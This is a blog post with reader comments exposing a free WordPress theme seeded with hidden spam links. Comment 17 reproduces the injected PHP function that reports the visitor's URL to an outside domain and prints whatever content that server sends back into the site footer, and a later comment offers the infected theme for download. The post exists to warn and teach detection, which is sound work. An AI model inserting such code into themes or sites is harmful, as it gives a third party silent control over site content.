Bracing Your Brand

Internet business and marketing with Robert Kingston

Subscribe

Lately I’ve been making a tonne of adjustments to my site and tweaking it to perform as best as it can in search engines. In the process however, I discovered a nasty tick that I’d been harbouring for a while.

I’m using a free WordPress Theme design called “I feel dirty” by some Spanish design firm. Whilst I was tearing the site apart and analysing the code I found that this company had been hiding links in my own blog with style="display: none;". Now, these weren’t just links crediting the theme author, they were hidden links promoting gambling, porn and other unsightly websites for the SEO-minded. Just take a look at this screen shot I took of the site without CSS styles to hide them:

A blackhat SEO Technique aimed at generating backlinks can hurt your page rankings in a number of ways.

Here is another screenshot showing the code and the address of the incriminating website:

HTML of theme spam links.

Now, when you have those links in your website, they serve to impact your search engine rankings on two fronts.

  • It associates you with a bad site.
  • They use sketchy techniques to hide links against Google’s Webmaster Guidelines.

For instance, notice how you cannot see any links down the bottom of my page in this picture? Sneaky Hidden spam links are bad for SEO.
There is a special CSS attribute that blackhat SEO “gurus” use to hide links from users. When you type style="display: none;" into your link code, they are hidden from users browsing your site, but not from search engines. Google is against it’s unethical use and I’m guessing other engines are too. While they do allow the technique to be used in some circumstances, I believe they might discount the content surrounded by that attribute.

You may call me a little hypocritical, but I use this attribute on my site to hide text as well, however I do it in a way that is useful to my users. In fact, I use it in the box below this post for the related content and post information. It’s just a more aesthetic way for me to provide my users with relevant information in a proper GUI. Google might count that content and they might not, but as long as I’m providing unique and relevant content to my users, naturally, I doubt they care.

So, next time you’re downloading a free theme, why don’t you take a look behind the scenes and scout out those style="display: none;" links!

For software which can disable CSS for you to find those links on your blog, go and grab the Firefox Web developer plugin!


UPDATE:

After some cyber sleuthing, Zen Zoomie has deduced that any theme downloaded from https://www.templatesbrowser.com/wordpress-themes/ are infected with spammy links. Checkout his first post about Infected Free Wordpress Themes and his summation of what we learned.

32 Responses to “WordPress Themes & Sneaky Hidden Links”

  1. That sucks dude! You can trust anyone. I don’t use Wordpress and all my templates are self made. However, I’ve downloaded php programs to add to my site only to discover the author is really creating linkbacks to his site! Want to get a ton of linkback. Write a program or in your case a template and distribute it. Of course hide the link.

    Patrick

  2. Tell me about it Pat…

    I thought it was credit enough to build backlinks through a link at the bottom of in footers but no. They had to monetise it with dodgy links.

    I wish I could make Wordpress Templates. I’ve been tweaking them and playing with the code for about 8 months or so now. And from what I’ve learned about optimising sites for search engines, I think it’d be well worth learning so I could make a site that fits my ideas about pushing page rank, creating relevant content and all that.

    Looks like you’re on the money with your site though. I’ve personally watched our forums dominate SERPs. Have you considered throwing up some more content in there or hiring people to chat in your forums temporarily?

    Robert Kingston

  3. Wow that is … just wow. I had no idea people were doing that.

    kevin

  4. I have to say that this is a great notice that you picked up. It is scary what can be on your theme. Courtney Tuttle helped me revise mine to make it more SEO friendly. Have you seen any improvements SEO wise since this awareness?

    Mark@CreditCards

  5. I’m not so sure to be honest. Search traffic is up slightly, as far as I can tell through Analytics. I think the real tell will be when the next PR update comes along, though.

    Robert Kingston

  6. Wow, that is something that every blogger should check. I had no idea that people were doing that kind of stuff. I am going to check my blog right now! Thanks so muc for the info!

    emily

  7. There’s another simple way to check for hidden links for those who don’t want to install the Firefox Web developer plugin. Just right-click on the page in Firefox and select “View Page Info”. The “Links” tab will show you every link on the page, hidden or not.

    Kevin Henney

  8. Hey Kev,

    I’ve never noticed that one. Thanks for the heads up…

    Robert Kingston

  9. Wow, this is really great information! Thanks for noticing and bringing it to our attention. I don’t use WordPress, but I have a friend who does. So I’m going to pass this info along. Thanks again!!!

    Beccagirl

  10. This is a shame, because it only hurts the honest wordpress theme designer, making them all look bad. Thank you for pointing this out though.

    Wii Fit

  11. Wow…who woulda thought? Are there any WordPress plugins or tools that can check your site for these hidden links?

    Zen Zoomie

  12. Wow, is this CSI:Australia? Why is it you just can’t do business, you must set aside part of your mind to be vigilant. Even locally, we had a situation where a competing design firm took all of their competition’s keywords and put them onto their site. The local design community thought this very unethical. They relented and removed them. I’m sure they were astonished that someone would ever know. But it was the inner geek in one of us who happened to trip over this - what a shame they felt the compulsion for the dark side.

    P.S. I like these changes Robert.

    Ed Roach

  13. Everyone will be scrambling over to their blogs and checking the code now, i know i will. I guess nothing in life is ever truly FREE! sally :)

    Sally Neill

  14. Hey Zen,

    I’ve never heard of any wordpress plugin which could check links inside you blog for those kind of spammy links, all I know that you can do to find out is by right clicking on your page in Firefox and selecting “View Page Info”, then you can visit a tab called “Links” where you’ll be able to work out which links are yours or not.

    The way I prefer to do it is by downloading a plugin for Firefox called the Firefox Web Developer toolbar and disabling CSS when you visit your website’s page. You can grab a copy of the web developer plugin here:
    https://addons.mozilla.org/en-US/firefox/addon/60

    Robert Kingston

  15. Hey Ed,

    Hahaha, yeah. I’ve picked this website apart so much I know it better than the back of my hand…

    I doubt these unethical practices will disappear anytime soon. Things are becoming way too complex these days to even notice the small things like hidden links and stolen keywords. Yaro and I run forums which people continually steal content from and its just way too hard to find until the last moment.

    I think the keywords aren’t too much of a problemthough. If anything the firm copying the keywords off their competitor’s website would probably get a nasty shock. I’m guessing the firm who owned the keywords originally had a professional SEO guru tend to their site. The person copying the keywords would probably have a harder time competing to rank for those same keywords.

    I guess at the end of the day, all that matters is whether or not you can fix it - if so, good news. If not, then we’ll have to deal with it and move on. Good to know that it got sorted out, I hate it when people do that…

    Also re: the changes I’ve made to my design - Thanks. I like it too. I guess you were always right about needing to have a white background with Dark text - hence the changes you made to your blog so long ago! Speaking of which, I can’t see any hidden links on yours at all…

    Robert Kingston

  16. Robert,

    Have you contacted the authors of the I Feel Dirty theme to ask them about this? I downloaded it today to do some investigative reporting of my own, and the hidden links you had on your site are no where to be found in the version I downloaded…

    Zen Zoomie

  17. Hey Zen,

    You’re dead right… It looks as if the original theme from Studio ST doesn’t contain the links at all. It must have been placed in there by a third party.

    When I downloaded myself, inside the functions.php file I found the following code:

    < ?php

    function credits()
    {
    $url = "https://get.templatesbrowser.com/wp.php?" .
    "url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
    $check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
    if($check)
    {
    @readfile($url);
    fclose($check);
    }
    }

    ?>

    When that function was called in the footer it placed random spam links inside my site.

    That’s nasty stuff… Thanks for the news!

    Robert Kingston

  18. The version I have had a comment in the footer.php that I found interesting:

    But no functions.php file or sign of the above code in sight. Just curious–where did you download it from?

    Zen Zoomie

  19. Hmm…looks like the code got stripped because it looked like PHP code.

    The comment inside it was this:
    /* “Just what do you think you’re doing Dave?” */

    Zen Zoomie

  20. I wish I could remember but I have no idea anymore. It definitely wasn’t from Studio ST’s website. It must have been the Wordpress theme Database.

    As for the comment, I don’t really know what they mean by that either. It’s just a comment so I don’t think it’s going to have an impact on things too much. Just count yourself lucky you didn’t find that functions.php!

    Robert Kingston

  21. For anyone interested to see what this code looks like, I’ve uploaded the untouched backup of the theme, which I keep on my computer.

    Take a look here:
    /byb/i-feel-dirty.rar (Right-click, ‘Save As’)

    Pay particular attention to ‘footer.php’ and how it calls the function responsible (< ?php credits(); wp_footer(); ?>) for the unsavoury links from ‘functions.php’.

    Robert Kingston

  22. […] just ran across a scary post at www.bracingyourbrand.com that took me back a couple of steps. Robert Kingston, the author of that site, had recently started […]

    Beware the Free WordPress Theme

  23. […] just ran across a scary post at www.bracingyourbrand.com that took me back a couple of steps. Robert Kingston, the author of that site, had recently started […]

    Beware the Free WordPress Theme

  24. Thanks Robert. So I guess the most likely villain here is whoever owns the domain templatesbrowser.com that’s serving up the hidden ads.?
    P.S. Fixed the link to your article from my site…
    ZZ

    Zen Zoomie

  25. […] a call to credits. Or as a third option, try using the free FireFox developer’s add-on that Robert suggested. The above steps will only catch templatesbrowser.com modified themes. Robert’s technique […]

    Beware the Free WordPress Theme - Revisited

  26. varun

  27. thanks for the heads up - i’ll check into these more often.

    I had bought some website translation software that did this - and it ranked number 1 in google… lol… but i disabled it and put in a visible link to the affiliate program instead.

    Matt Ellsworth

  28. Had a client whose site was hacked. The hacker put in some links to porn sites, and CSS’ed them to invisibility. It seems Google discovered these links and penalized the page (which was when we noticed). While this case had nothing to do with WordPress, per se, please be aware that these sort of invisible links can absolutely hurt you in the search engines.

    Brian Combs

  29. Wow…I think I’m going to cruise through all my templates and double check that I don’t have any of that nonsense going on.

    Irvine Mortgage

  30. Great post, this and wordpress upgrades is what people should pay most attention to. XSS vulnerabilities from wordpress bugs are even worse than this.

    Palm Coast

  31. Hmmm… I’m not too sure how XSS vulnerabilities work but It’s understandable that some people could do some serious damage by infecting free themes with malicious script, not so different than what we’ve seen above.

    Robert Kingston

  32. I had no idea this kind of thing was going on. Just goes to show that even if it’s unethical and we should not be using it ourselves it definitely is in every webmaster and bloggers best interests to at least learn about blackhat techniques. After hearing about this I just feel completely used.

    Survey Spot

Leave a Reply